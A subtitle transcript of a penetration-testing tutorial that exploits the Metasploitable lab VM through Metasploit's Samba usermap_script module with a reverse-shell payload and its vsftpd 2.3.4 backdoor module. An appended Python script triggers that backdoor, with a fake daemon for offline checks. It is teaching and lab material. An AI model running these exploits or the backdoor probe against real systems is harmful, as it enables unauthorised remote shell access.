1
00:00:00,240 --> 00:00:00,880
Hello everybody

2
00:00:00,960 --> 00:00:02,180
and welcome back.

3
00:00:02,180 --> 00:00:08,790
And in this tutorial right here I will show you how you can perform two different attacks on the

4
00:00:08,800 --> 00:00:09,380
Metasploitable.

5
00:00:09,390 --> 00:00:11,030
So just follow my steps.

6
00:00:11,130 --> 00:00:17,290
If you have Metasploitable up and running, you should be able to exploit it with these two attacks.

7
00:00:17,310 --> 00:00:21,230
So the first one that we will do is an attack on Samba.

8
00:00:21,240 --> 00:00:26,980
Now I believe that it has the same vulnerability as on the OWASP virtual machine,

9
00:00:27,120 --> 00:00:33,930
but I could be wrong. So let me just first of all zoom this in, I will zoom it in twice, and what I will do

10
00:00:33,990 --> 00:00:36,720
is I will run my Metasploit Framework console.

11
00:00:36,720 --> 00:00:42,080
After that we will search for some of the Samba exploits and we will see how we can exploit the Metasploitable

12
00:00:42,090 --> 00:00:43,680
virtual machine.

13
00:00:43,680 --> 00:00:46,020
So, let's wait for this to open...

14
00:00:49,250 --> 00:00:51,490
and OK. So we are good to go. Now

15
00:00:51,530 --> 00:00:53,270
right now what we want to do,

16
00:00:53,420 --> 00:00:56,280
let's say my OWASP is my Metasploitable.

17
00:00:56,300 --> 00:00:58,930
So you run a scan on it,

18
00:00:59,180 --> 00:01:05,110
it will finish in a few seconds, and you find out there are open ports. So the open ports for Samba

19
00:01:05,150 --> 00:01:09,470
I believe are something like 445, or 139, or something like that.

20
00:01:09,530 --> 00:01:15,860
And then after you find out which version it is running, and on which port it is running, you can

21
00:01:15,860 --> 00:01:21,800
search for the exploit that will suit you. So we can see right here that it is running Samba 3.X.

22
00:01:21,800 --> 00:01:26,690
Well, basically, 3.X, which is basically any version from 3 to 4,

23
00:01:27,110 --> 00:01:28,730
and on the 445 port.

24
00:01:28,730 --> 00:01:30,910
Also, running the same version.

25
00:01:30,950 --> 00:01:37,370
So what we want to do is basically just click here, type here "search samba", and it will list us

26
00:01:37,460 --> 00:01:42,710
all of the available exploits for this software.

27
00:01:42,710 --> 00:01:48,750
So let me just zoom this out so we can see it a little bit better, and we are not going to use

28
00:01:48,750 --> 00:01:54,320
auxiliary anymore. What we will use is the exploit. What we want to use is this one at the moment,

29
00:01:54,440 --> 00:02:03,650
so exploit/multi/samba/usermap_script. It came out in 2007, it's rated as excellent,

30
00:02:03,740 --> 00:02:07,730
and it says right here, Samba "username map script" Command Execution.

31
00:02:07,850 --> 00:02:14,090
So, for example, you could also check out some of the other ones, but let's say the upper one is only working

32
00:02:14,090 --> 00:02:19,370
for the versions from 2.2.2 to 2.2.6.

33
00:02:19,370 --> 00:02:28,370
So it wouldn't work for our own version. So let's use this one. And I repeat that you need to

34
00:02:28,370 --> 00:02:32,800
have the Metasploitable open for this to work.

35
00:02:32,870 --> 00:02:38,030
So now that we have selected the exploit, let us show our available options right here.

36
00:02:38,180 --> 00:02:42,420
You can see that the available options are RHOSTS and RPORT.

37
00:02:42,560 --> 00:02:46,700
Now RPORT is already set as 139, which is correct in my case.

38
00:02:46,700 --> 00:02:48,250
Now it can also be 445.

39
00:02:49,160 --> 00:02:54,080
If you're running that on both ports you can actually check both of them,

40
00:02:54,590 --> 00:03:01,160
one after another. And what you want to set is "set", and then RHOSTS, and then the IP address of

41
00:03:01,160 --> 00:03:06,320
your Metasploitable. So I will use the OWASP in my case, it doesn't really matter.

42
00:03:06,320 --> 00:03:11,780
After that what you want to do is actually select the payload that you will use in order to exploit

43
00:03:11,780 --> 00:03:12,860
this machine.

44
00:03:12,860 --> 00:03:17,570
Now the payload, you can check out your available payloads with the "show payloads" option that we covered in

45
00:03:17,570 --> 00:03:22,970
the previous videos. It will print out all of the payloads that you can use for this attack.

46
00:03:22,970 --> 00:03:30,050
Now the one that I found working on Metasploitable would be the cmd/unix/reverse, which is this

47
00:03:30,050 --> 00:03:35,300
one right here. So you could just copy that payload right here.

48
00:03:35,300 --> 00:03:36,020
The ranking,

49
00:03:36,020 --> 00:03:37,580
they all rank as normal,

50
00:03:37,580 --> 00:03:41,700
and this one is Unix Command Shell, Double Reverse TCP.

51
00:03:42,410 --> 00:03:50,150
So what we want to do is "set payload", and then paste the payload that we're going to use.

52
00:03:50,150 --> 00:03:53,080
Once you select that, you want to show options once again.

53
00:03:56,110 --> 00:03:59,990
And you will see that the only thing we need to specify in order to get it to work,

54
00:04:00,010 --> 00:04:02,270
we need to specify the LHOST.

55
00:04:02,270 --> 00:04:04,540
So LHOST is our Kali Linux machine.

56
00:04:04,540 --> 00:04:09,040
So just type here your IP address, which in my case is .1.7 I believe.

57
00:04:09,040 --> 00:04:17,110
So "set RHOST 192.168.1.7", and all you have to do after this is basically

58
00:04:17,170 --> 00:04:24,150
just type "run". This will run on your Metasploitable and it should give you a reverse shell in return.

59
00:04:24,160 --> 00:04:28,210
Now since I'm scanning the OWASP this will not work for me. As it says right here,

60
00:04:28,210 --> 00:04:34,660
exploit completed but no session was created, which I pretty much think means that this virtual machine,

61
00:04:34,720 --> 00:04:37,580
which is the OWASP, isn't vulnerable to this attack.

62
00:04:38,000 --> 00:04:44,020
But this one should work on your Metasploitable. What you will get is, basically, it won't prompt you for anything,

63
00:04:44,200 --> 00:04:47,670
but it will basically look like it came out.

64
00:04:47,680 --> 00:04:53,270
But once you type "ls", it will list all of the files on the Metasploitable that

65
00:04:53,500 --> 00:04:56,050
are located in the directory.

66
00:04:56,050 --> 00:05:00,690
So, that is one of the attacks that you want to use against the Metasploitable.

67
00:05:00,790 --> 00:05:05:950
The other attack is on the FTP port, which is port 21.

68
00:05:05,950 --> 00:05:07,660
It is very simple to exploit.

69
00:05:07,690 --> 00:05:12,500
You just need to set RHOST and just click exploit. It is on the,

70
00:05:12,760 --> 00:05:16,840
I believe that on Metasploitable over port FTP, which is port 21,

71
00:05:16,840 --> 00:05:19,350
it is running a version,

72
00:05:19,630 --> 00:05:20,440
pardon me,

73
00:05:20,440 --> 00:05:22,140
vsftpd 2.3.4,

74
00:05:22,280 --> 00:05:27,250
or something like that, which is basically vulnerable to this attack.

75
00:05:27,250 --> 00:05:34,210
So what we want to do, first of all, you can nmap the Metasploitable, if you want to, and see the

76
00:05:34,210 --> 00:05:43,450
RPORT 21 yourself. And after that you use exploit/unix/ftp/vsftpd_234_backdoor.

77
00:05:43,450 --> 00:05:45,930
So let me just close this so you can see better.

78
00:05:46,960 --> 00:05:50,300
Click here, enter, and then show your available options.

79
00:05:50,300 --> 00:05:55,540
So "show options" will show you that the only thing to specify is RHOSTS.

80
00:05:56,200 --> 00:06:04,000
So you specify the RHOSTS 192.168.1.2, which is basically the IP

81
00:06:04,000 --> 00:06:08,460
address of your Metasploitable, and all you need to do is click run right here. Now

82
00:06:08,470 --> 00:06:10,830
I won't be running this since I don't have Metasploitable running,

83
00:06:10,840 --> 00:06:16,180
and on OWASP this version of the service doesn't exist.

84
00:06:16,180 --> 00:06:23,960
Basically, port 21 isn't even open on OWASP. So those are two attacks that you can try on

85
00:06:23,960 --> 00:06:25,560
Metasploitable if you want to.

86
00:06:26,030 --> 00:06:27,760
You will not encounter it anywhere else.

87
00:06:27,760 --> 00:06:32,110
These are just some of the older versions that basically got patched long ago.

88
00:06:32,150 --> 00:06:38,900
So, these are not some of the real-life attacks that you will encounter, but you never know. In the next

89
00:06:38,900 --> 00:06:43,340
videos we will try exploiting the Windows machines.

90
00:06:43,360 --> 00:06:50,520
So that will be some of the real-life attacks that you can actually perform with payloads, with the Meterpreter

91
00:06:50,570 --> 00:06:51,630
shell open.

92
00:06:51,650 --> 00:06:56,870
So we will do that in the next tutorial, and I hope I see you there. Bye!
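The transcript ends above. What follows is an added example that is not part of the tutorial, of Metasploitable, or of Metasploit's own module code: a stand-alone Python check for the vsftpd 2.3.4 backdoor that exploit/unix/ftp/vsftpd_234_backdoor targets, so you can verify what the module relies on without msfconsole. It assumes one fact the page does not state but which is well documented for that release: an FTP username containing the bytes ":)" makes the backdoored daemon open a shell on TCP port 6200. Everything else (the fake FTP daemon, its randomly chosen ports, and the toy "shell" that only answers echo) is constructed here so the check runs offline; nothing is executed on any host.

```python
"""Probe for the vsftpd 2.3.4 backdoor (the bug behind
exploit/unix/ftp/vsftpd_234_backdoor) plus a constructed fake daemon
so the probe can be exercised offline. Assumed mechanism (a known
property of the 2.3.4 tarball, not stated on the page): a ':)' in the
USER string opens a shell listening on TCP 6200."""
import socket
import threading
import time

TRIGGER = b":)"      # magic bytes in the FTP username
SHELL_PORT = 6200    # where the backdoor listens once triggered


def _readline(sock):
    """Read one line (ends at '\\n', EOF or timeout); partial data on timeout."""
    buf = b""
    try:
        while not buf.endswith(b"\n"):
            chunk = sock.recv(1)
            if not chunk:
                break
            buf += chunk
    except OSError:          # socket.timeout is an OSError subclass
        pass
    return buf


def check_vsftpd_backdoor(host, ftp_port=21, shell_port=SHELL_PORT,
                          timeout=3.0, attempts=10):
    """Return True if a ':)' username makes a shell appear on shell_port.
    The shell is verified by echoing a token, the same idea as the
    Metasploit module sending 'id' and looking for 'uid=' in the reply."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        _readline(ftp)                                 # 220 banner
        ftp.sendall(b"USER probe" + TRIGGER + b"\r\n")
        _readline(ftp)                                 # 331, if it ever comes
        ftp.sendall(b"PASS probe\r\n")                 # do not wait for a reply
    token = b"vsftpd-backdoor-probe"
    for _ in range(attempts):                          # the shell takes a moment
        try:
            with socket.create_connection((host, shell_port), timeout=timeout) as sh:
                sh.sendall(b"echo " + token + b"\n")
                return token in _readline(sh)
        except OSError:                                # refused: not (yet) open
            time.sleep(0.2)
    return False


def _free_port():
    """Pick an unused localhost port for the constructed fake daemon."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


class FakeVsftpd(threading.Thread):
    """Constructed stand-in for vsftpd on 127.0.0.1 (not real vsftpd code).
    With backdoored=True it mimics 2.3.4: a ':)' in USER starts a listener
    on shell_port whose toy 'shell' only answers 'echo <text>'."""

    def __init__(self, backdoored):
        super().__init__(daemon=True)
        self.backdoored = backdoored
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(1)
        self.ftp_port = self.listener.getsockname()[1]
        self.shell_port = _free_port()

    def run(self):
        conn, _ = self.listener.accept()
        with conn:
            try:
                conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                user = _readline(conn)
                if self.backdoored and TRIGGER in user:
                    threading.Thread(target=self._shell, daemon=True).start()
                conn.sendall(b"331 Please specify the password.\r\n")
                _readline(conn)                        # PASS line
                conn.sendall(b"530 Login incorrect.\r\n")
            except OSError:                            # client already gone
                pass
        self.listener.close()

    def _shell(self):
        srv = socket.socket()
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", self.shell_port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            line = _readline(conn).strip()
            if line.startswith(b"echo "):
                conn.sendall(line[5:] + b"\n")
        srv.close()


def demo():
    """Run the probe against a backdoored and a clean fake daemon."""
    results = {}
    for name, backdoored in (("vsftpd 2.3.4 (backdoored)", True),
                             ("clean build", False)):
        srv = FakeVsftpd(backdoored)
        srv.start()
        results[name] = check_vsftpd_backdoor("127.0.0.1", srv.ftp_port,
                                              srv.shell_port, timeout=2.0)
    return results


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name}: {'backdoor shell reachable' if hit else 'no backdoor'}")
```

Against a real target you would call check_vsftpd_backdoor(host) with the defaults (port 21, shell on 6200); the retry loop matters because the daemon opens the shell only after it has parsed the username, and the clean-build case shows the probe reporting nothing when that port never opens.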